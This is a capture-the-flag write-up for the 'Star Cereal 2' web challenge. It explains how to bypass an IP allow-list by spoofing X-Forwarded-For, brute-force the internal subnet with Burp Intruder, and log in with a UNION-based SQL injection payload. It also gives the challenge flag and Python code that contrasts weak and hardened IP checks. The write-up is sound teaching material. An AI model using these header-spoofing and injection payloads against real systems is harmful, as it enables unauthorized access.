# Star Cereal 2

## Description

Ha, that was sneaky! But I've patched the login so that people like you can't gain access anymore. Stop hacking us!

`http://20.198.209.142:55045`

*The flag is in the flag format: STC{...}*

**Author: zeyu2001**

## Solution

In `index.php`, notice the following comment:

```markup
<!--
Star Cereal page by zeyu2001

TODO:
    1) URGENT - fix login vulnerability by disallowing external logins (done)
    2) Integrate admin console currently hosted at http://172.16.2.155
-->
```

Point 1) is referring to the previous challenge. Point 2) is interesting.

If we go to `login.php`, we get a 403 Forbidden page:

```markup
<h1>Forbidden</h1>
<p>Only admins allowed to login.</p>
```

### Spoofable Client IP

We can deduce that the server probably filters requests by the client IP address.

A common security misconfiguration in such a filter is trusting the [X-Forwarded-For header](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For). This header is used to identify the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer, but it is set by whoever sends the request, not by the server.

Note that HTTP request headers can be [easily spoofed](https://portswigger.net/kb/issues/00400110_spoofable-client-ip-address). Knowing that one of the internal IP addresses is 172.16.2.155, we may want to check the 172.16.2.0/24 subnet for valid client IPs.

If we do a scan (e.g. using Burp Suite Intruder) for the 172.16.2.0/24 subnet with the `X-Forwarded-For` header, we would find that if we set:

```http
X-Forwarded-For: 172.16.2.24
```

then we would see the login page.
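To show why the filter could be bypassed, here is an added Python model of the check (not the challenge's PHP): a naive version that trusts whatever `X-Forwarded-For` says, beside a hardened version that only honours the header when the TCP peer is a known reverse proxy. The proxy address 10.0.0.5 and the use of 172.16.2.0/24 as the admin allow-list are assumptions.

```python
import ipaddress

# Constructed values (assumption): the reverse proxy that is allowed to set
# X-Forwarded-For, and the internal range that is permitted to reach login.php.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}
ADMIN_NET = ipaddress.ip_network("172.16.2.0/24")


def naive_client_ip(remote_addr, xff):
    """Weak check: the first X-Forwarded-For hop wins, whoever supplied it."""
    if xff:
        return ipaddress.ip_address(xff.split(",")[0].strip())
    return ipaddress.ip_address(remote_addr)


def hardened_client_ip(remote_addr, xff):
    """Honour X-Forwarded-For only when the peer is one of our proxies, then
    walk the list right-to-left past proxies we own; the first foreign hop is
    the client, because everything to its left was supplied by the client."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES:
        return peer  # direct connection: the header is attacker-controlled, ignore it
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed entry: fall back to the peer address
        if addr not in TRUSTED_PROXIES:
            return addr
    return peer


def admin_allowed(remote_addr, xff, resolver):
    """Apply the login.php style allow-list using the given resolver."""
    return resolver(remote_addr, xff) in ADMIN_NET


def xff_from_untrusted_peer(remote_addr, xff):
    """Detection hook: a non-proxy peer sending X-Forwarded-For is worth logging."""
    return bool(xff) and ipaddress.ip_address(remote_addr) not in TRUSTED_PROXIES
```

With the naive resolver a direct client claiming `172.16.2.24` is admitted; the hardened resolver admits that address only when the proxy itself reports it.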

### Burp Suite Intruder Scan

First, set the payload position as follows:

![](/files/iOwuJsc3sdvsSwGu4y1F)

Then, configure the payload as a list of numbers from 1 to 255.

![](/files/yl5z7JAuZnkjBi5kW0Wl)

Run the attack. Sort the output by either the Status or Length columns. We will find that `X-Forwarded-For: 172.16.2.24` gives us a 200 OK response code, and shows us the login page.

![](/files/Lz1fxvlCQYCXIo2AdP8N)

### SQL Injection

Once we have access to the login page, notice the login form fields:

```markup
<form action="/login.php" method="post">
	<div class="form-group">
		<label for="email">Email address</label>
		<input type="email" class="form-control" id="email" name="email" placeholder="Enter email">
	</div>
	<div class="form-group">
		<label for="pass">Password</label>
		<input type="pass" class="form-control" id="pass" name="pass" placeholder="Enter password">
	</div>
	<button type="submit" class="btn btn-primary">Submit</button>
</form>
```

The form submits an `email` and a `pass` parameter. The `pass` parameter is not sanitised, so we can exploit SQL injection to get the flag.

```http
POST /login.php HTTP/1.1
Host: localhost:55043
X-Forwarded-For: 172.16.2.24

...

Content-Type: application/x-www-form-urlencoded
Content-Length: 51

email=test&pass=test' UNION SELECT 'test', 'test';#
```

The flag is `STC{w0w_you'r3_r3lly_a_l33t_h4x0r_bc1d4611be52117c9a8bb99bf572d6a7}`.

![](/files/Q5NY5q47w5XL4gcJ6Pb8)
